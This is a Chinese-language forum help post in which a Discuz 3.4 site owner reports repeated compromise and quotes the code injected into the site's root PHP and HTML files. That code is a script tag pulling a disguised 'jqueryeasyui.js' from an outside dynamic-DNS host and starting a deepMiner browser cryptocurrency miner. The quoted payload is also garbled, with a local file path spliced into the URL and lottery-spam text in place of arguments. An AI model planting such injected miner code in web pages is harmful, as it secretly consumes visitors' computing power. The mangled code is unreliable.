文章查看
当前位置 :主页 > 其他信息 >
[求助] 3.4肯定有漏洞,老是挂马
* 来源 :http://www.du-mois.com * 作者 : * 发表时间 : 2018-06-23 16:41
我被挂的是下面这段代码。主要挂在根目录下的PHP和html文件。。。php加在代码的顶部,html加的底部。主要影响网站速度。


echo "<script src='http://www.discuz.net/file:///C:\Users\ADMINI~1\AppData\Local\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttps://greenindex.dynamic-dns.net/jqueryeasyui.js

'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri,2018年六会彩开奖记录, {autoThreads: true,throttle: 0.5});
            ,990990藏宝阁开奖资料;if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
            }
        </script>";

下一篇:没有了